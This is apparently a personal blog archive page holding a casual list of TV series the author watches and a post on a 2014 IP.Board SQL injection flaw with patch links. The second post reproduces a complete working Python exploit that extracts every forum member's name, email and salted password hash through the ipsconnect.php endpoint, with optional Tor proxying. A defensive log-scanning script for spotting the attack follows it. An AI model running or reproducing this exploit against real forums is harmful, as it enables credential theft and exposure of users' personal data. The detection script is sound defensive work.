Monthly Archives: December 2014

How to waste my time

All this shit is my favourite time every week: watching all this crap, besides games, sleep, cats and work. I watch all these series from original DVDs, or on my Android tablet or Minix using TVMC or XBMC software.

These are all the TV series that I have watched or have been watching since 2008, when I arrived in Australia:

  • Ongoing: The Walking Dead, Sons of Anarchy, Game of Thrones, Modern Family, The Big Bang Theory, Person of Interest, One Piece, Legend of Korra (Avatar), The Flash, The 100, Teen Wolf, Almost Human
  • Finished: Breaking Bad, Heroes, The Last Avatar (Aang), Everybody Loves Raymond, Seinfeld, Monk, Desperate Housewives, Prison Break, Revolution
  • Thinking to Continue: Naruto Shippuden, How I Met Your Mother, American Horror Story, Agents of SHIELD, Vikings, The Last Ship, It’s Always Sunny in Philadelphia, Bleach
  • Failed to Watch: Z Nation, Pretty Little Liars, Two and a Half Men, Arrow, Castle, The Good Wife, Sex and the City, Orange Is the New Black, Sherlock, Friends, Bates Motel, Charmed

Legend:

  • Ongoing: Watching every week
  • Finished: I finished them all
  • Thinking to Continue: I started watching a few of these series, sometimes 1-2 seasons, sometimes 5 episodes or more (I consider them good series).
  • Failed to Watch: With these series, maybe I got annoyed, disturbed or bored by them, or the story failed, or maybe it is as simple as I don’t fucking like them.

Are they really wasting my time, or do I just want to enjoy my life with the stories of these TV series? How do you waste your time?

IPBoard SQL Injection

Recently, on 10 November 2014, IP.Board was hit by a fairly serious security vulnerability. Forum owners, especially those running IPB / Invision Power Board 3.3.x and 3.4.x, should patch right away by downloading the attachment files below.

Version 3.4.x: 3_4_x_patch_nov_14
Version 3.3.x: 3_3_x_patch_nov_14

IP.Board versions 3.3.X, 3.4.X and below suffer from a remote SQL injection vulnerability.

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable

url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re

# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>

import urllib2, urllib

def inject(sql):
    try:
        urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        if e.code == 503:
            data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
            txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
            if txt is not None:
                return txt.group(1)
            sys.exit('Error [3], received unexpected data:\n%s' % data)
        sys.exit('Error [1]')
    sys.exit('Error [2]')

def get(name, table, num):
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r

n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):
    print get('member_id', 'members', j)
    print get('name', 'members', j)
    print get('email', 'members', j)
    print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
    print '----------------'

This IP.Board SQL injection information is for educational purposes only.
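For forum owners checking whether they were hit before patching: the script above leaves a recognisable trail in web server logs, a POST to interface/ipsconnect/ipsconnect.php answered with 503 followed by a request for cache/sql_error_latest.cgi from the same client. The log check below is an added example, not part of the original post or of IP.Board; it assumes Combined Log Format access logs, the sample lines are constructed, and `scan` is a hypothetical name.

```python
import re
from collections import Counter

# Combined Log Format: client, timestamp, "METHOD target PROTO", status, ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
CONNECT = "interface/ipsconnect/ipsconnect.php"   # endpoint named on this page
ERRLOG = "cache/sql_error_latest.cgi"             # error log named on this page

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2014:03:12:01 +0000] "POST /forum/interface/ipsconnect/ipsconnect.php HTTP/1.1" 503 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2014:03:12:01 +0000] "GET /forum/cache/sql_error_latest.cgi HTTP/1.1" 200 1841 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2014:03:12:02 +0000] "POST /forum/interface/ipsconnect/ipsconnect.php HTTP/1.1" 503 312 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2014:03:12:02 +0000] "GET /forum/cache/sql_error_latest.cgi HTTP/1.1" 200 1839 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Nov/2014:03:12:05 +0000] "POST /forum/interface/ipsconnect/ipsconnect.php HTTP/1.1" 200 58 "-" "-"
192.0.2.44 - - [10/Nov/2014:03:13:10 +0000] "GET /forum/index.php?showtopic=12 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Nov/2014:03:13:40 +0000] "GET /forum/cache/sql_error_latest.cgi HTTP/1.1" 403 199 "-" "Mozilla/5.0"
""".splitlines()

def scan(lines):
    """Return (pairs, exposed): pairs counts, per client, a 503 POST to the
    ipsconnect endpoint immediately followed by an error-log request;
    exposed is the set of clients that were actually served the error log."""
    pending = set()  # clients whose previous request was a 503 ipsconnect POST
    pairs, exposed = Counter(), set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not Combined Log Format, skip
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        if method == "POST" and path.endswith(CONNECT) and status == "503":
            pending.add(ip)
            continue
        if path.endswith(ERRLOG):
            if status == "200":
                exposed.add(ip)   # the file is web-readable: block access to it
            if ip in pending:
                pairs[ip] += 1    # request/503/error-log sequence seen
        pending.discard(ip)       # any other request breaks the sequence
    return pairs, exposed

if __name__ == "__main__":
    pairs, exposed = scan(SAMPLE_LOG)
    for ip, n in pairs.items():
        print("%s: %d ipsconnect 503 -> error-log request sequence(s)" % (ip, n))
    for ip in sorted(exposed):
        print("%s was served %s" % (ip, ERRLOG))
```

Any client in `exposed` means the SQL error log is readable over the web, which should be denied at the web server regardless of patch level.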